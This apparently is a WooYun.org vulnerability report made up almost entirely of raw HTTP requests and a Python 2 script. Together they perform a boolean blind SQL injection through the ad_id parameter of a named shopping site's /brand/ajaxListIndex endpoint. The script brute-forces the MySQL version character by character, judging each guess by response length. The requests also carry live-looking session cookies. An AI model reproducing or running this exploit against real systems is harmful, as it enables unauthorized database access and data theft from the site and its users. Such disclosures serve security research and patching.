WooYun.org

POST /brand/ajaxListIndex HTTP/1.1
Host: www.jinritemai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r11nlj7i7rq0qm5j67q1v7b2m1; SERVERID=095dff632a5f554d948297d59eb3497e|1426903249|1426903211; StatComcurrent_page_id=112827337520150321; WwwComschema=web; WwwComuser_info=YTo0OntzOjc6InVzZXJfaWQiO3M6ODoiMjE2NTMzMjciO3M6MzoiZW52IjtzOjY6Im9ubGluZSI7czoxMToiY3JlYXRlX3RpbWUiO2k6MTQyNjkwMzI0NDtzOjk6InVzZXJfY29kZSI7czozMjoiMDg4NDhmNTYwOWI3NGQwOGYyM2Q5NmZjZTUwODZkYTAiO30%3D; WwwComuser_id=21653327
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
data: categoryid=0&page=0&ad_id=&changecategory=0

POST /brand/ajaxListIndex HTTP/1.1
Host: www.jinritemai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=r11nlj7i7rq0qm5j67q1v7b2m1; SERVERID=095dff632a5f554d948297d59eb3497e|1426905819|1426903211; StatComcurrent_page_id=112827337520150321; WwwComschema=web; WwwComuser_info=YTo0OntzOjc6InVzZXJfaWQiO3M6ODoiMjE2NTMzMjciO3M6MzoiZW52IjtzOjY6Im9ubGluZSI7czoxMToiY3JlYXRlX3RpbWUiO2k6MTQyNjkwMzI0NDtzOjk6InVzZXJfY29kZSI7czozMjoiMDg4NDhmNTYwOWI3NGQwOGYyM2Q5NmZjZTUwODZkYTAiO30%3D; WwwComuser_id=21653327
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
categoryid=0&page=0&ad_id=1 || ascii(left(version(),1))=53&changecategory=0

#!/usr/bin/python
#coding:utf_8
import httplib
import time
import urllib
import sys
import random
headers = {"Content-type": "application/x-www-form-urlencoded",  
           'Accept-Language':'zh-CN,zh;q=0.8',  
           'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0)',  
           "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  
           "Connection": "close",  
           "Cache-Control": "no-cache"}
post_data = {"categoryid":'0',
             "page":'0',
             "changecategory":'0'
             }
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
base_url = "/brand/ajaxListIndex"
user = ''
def sql():
    
    global post_data
    global user
    
    cookie = raw_input("pls input your cookie:")
    headers["Cookie"] = cookie
    
    for i in range(1,15):
        for payload in payloads:
            getuser = "1 || ASCII(MID(version(),%d,1)) = %d" % (i,ord(payload))            
            post_data["ad_id"] = getuser   
    
            postdata = urllib.urlencode(post_data)
            conn = httplib.HTTPConnection('www.jinritemai.com',80,timeout=60)
            conn.request('POST', base_url, postdata, headers)
            response = conn.getresponse()
            html_contet = response.read().decode('utf-8')
            html_contet_len = len(html_contet)
            print html_contet_len
#            print html_contet
    
            if  html_contet_len > 14000:
                user += payload
                sys.stdout.write('\r[In Progress' + user)
                sys.stdout.flush()
                break
            else:
                print 'WAITING...' + str(random.randint(1,100))
if __name__ == "__main__":
    sql()
    print '\n[Done]MySQL version is ' + user
    print time.strftime('%H:%M:%S', time.localtime())